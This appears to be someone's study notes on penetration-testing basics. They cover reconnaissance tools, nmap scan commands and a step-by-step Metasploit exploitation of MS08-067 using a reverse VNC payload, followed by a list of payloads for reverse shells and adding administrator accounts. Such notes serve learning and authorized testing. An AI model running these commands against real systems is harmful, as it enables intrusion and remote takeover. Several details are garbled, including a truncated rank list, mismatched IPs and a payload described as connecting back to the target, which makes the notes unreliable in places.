under recon

HTTrack websitecopier
google- directives
the harvester (email harvester)
whois.net
netcraft
host
Ns lookup
email extractor
( One of the first things to do when
attempting to recon an e-mail server is to send an e-mail to the organization
with an empty .bat file or a nonmalicious .exe file like calc.exe.)

scanning
ping
port scanning

Port Number Service

20 FTP data transfer
21 FTP control
22 SSH
23 Telnet
25 SMTP (e-mail)
53 DNS
80 HTTP
443 HTTPS

TCP
To run a TCP connect, we issue the following command from a terminal:
nmap –sT -p- -PN 172.16.45.135

SYN
To run a SYN scan, you can open a terminal window and issue the following
command:
nmap –sS -p- -PN 172.16.45.135

UDP
To run a UDP scan against our target, we would enter
the following command in a terminal:
nmap –sU 172.16.45.129

vulnerability scanning
www.nessus.org.

exploit
using metasploit
from your nessus result
type msf > search ms08-067

(
After searching, Metasploit found a matching exploit and provided us with
several pieces of information about the exploit.
● First it provided us with a name and location; “windows/smb/
ms08_067_netapi.”
● Next Metasploit provided us with a “Rank.”
It is important to pay close attention to the exploit rank. This information
provides details about how dependable the exploit is (how often the exploit is
successful) as well as how likely the exploit is to cause instability or crashes on
the
target system. Numerically, the higher an exploit is ranked, the more likely it
is to succeed and the less likely it is to cause disruptions on the target system.
Metasploit uses seven ratings to rank each exploit:
1. Manual
2. Low
3. Average
4. Normal
5. Good
)

msf > use windows/smb/ms08_067_netapi

msf  show payloads

msf  set payload windows/vncinject/reverse_tcp

msf > show options

After issuing the show options command, we are presented with a series of
choices that are specific to the payload we have chosen. When using the
“windows/vncinject/reverse_tcp” payload, we see that there are two options that
need to be set because they are missing any default information. The first is
“RHOST” and the second is “LHOST.” RHOST is the IP address of the remote
host and LHOST is the IP address you are attacking from. To set these options,
we issue the “set option_name” command in the msf terminal:
msf  set RHOST 172.168.45.130
msf  set LHOST 172.168.45.135

msf  show options

msf  exploit

///
Metasploit Payload Name Payload Description
windows/adduser Create a new user in the local administrator
group on the target machine
windows/exec Execute a Windows binary (.exe) on the target
machine
windows/shell_bind_tcp Open a command shell on the target machine
and wait for a connection
windows/shell_reverse_tcp Target machine connects back to the attacker
and opens a command shell (on the target)
windows/meterpreter/bind_tcp Target machine installs the Meterpreter and
waits for a connection
windows/meterpreter/reverse_tcp Installs Meterpreter on the target machine then
creates a connection back to the attacker
windows/vncinject/bind_tcp Installs VNC on the target machine and waits
for a connection
windows/vncinject/reverse_tcp Installs VNC on the target machine and sends
VNC connection back to target
//